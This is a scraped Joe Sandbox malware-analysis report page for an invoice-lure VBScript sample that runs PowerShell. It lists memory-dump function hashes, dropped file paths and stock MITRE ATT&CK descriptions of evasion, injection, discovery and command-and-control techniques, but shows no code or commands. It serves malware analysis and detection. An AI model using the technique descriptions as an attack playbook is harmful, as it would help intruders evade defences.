Opcode ID: be537beee21c93acc87eb7b33a4c3b1bf6d7873b75519483932fb465a20345cf
Instruction ID: dfcef594197542b24b9b22084ddb2cb761821dec82feecd0f30417939f94c15c
Opcode Fuzzy Hash: be537beee21c93acc87eb7b33a4c3b1bf6d7873b75519483932fb465a20345cf
Instruction Fuzzy Hash: 6A51D39281E7C55FE3939B384C695A63FA4DF53254B0A51FBE1C9CB0E3D8086D4AC362

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B3340B9 Relevance: .5, Instructions: 486COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e3bb82334c7bf21f60c98a987b0b96afa57ffcacc1bfe5382da246996e8a16
Instruction ID: fec8b3ed54527112b75cff7cb9c01a35898e4795c94336997a45b1ba127e8d5c
Opcode Fuzzy Hash: 14e3bb82334c7bf21f60c98a987b0b96afa57ffcacc1bfe5382da246996e8a16
Instruction Fuzzy Hash: FAE146B390DA8A0FE795EFBCC8951BA7BE1EF55220B1841BAD14DC71E3DA18AC058341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B334257 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687412d17584089bae7b6da7b4de77d7025432e7e45b1381c66277a187eeea7b
Instruction ID: 1ba9cea8d70e0ab8fa6658254a39d196908684f1ee045014ca83b7ae1bd27e53
Opcode Fuzzy Hash: 687412d17584089bae7b6da7b4de77d7025432e7e45b1381c66277a187eeea7b
Instruction Fuzzy Hash: 035136A391EA8A0FE392FFBDC99017A6AD1AF51260B5850F9E19CC31E3DD1CAC048341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B263945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1531719397.00007FFB4B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb4b260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 864077519ff0b0c3641f8ff60c33cf0aeaebd100273d8e65676a99af2e43e9b2
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: FB01677115CB0C8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3665D636E882CB45

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FACTURA 130424435.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqhw45uk.d0b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef2zxxa.h5r.ps1

C:\Users\user\AppData\Roaming\Cabassou.Tun

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
FACTURA 130424435.vbs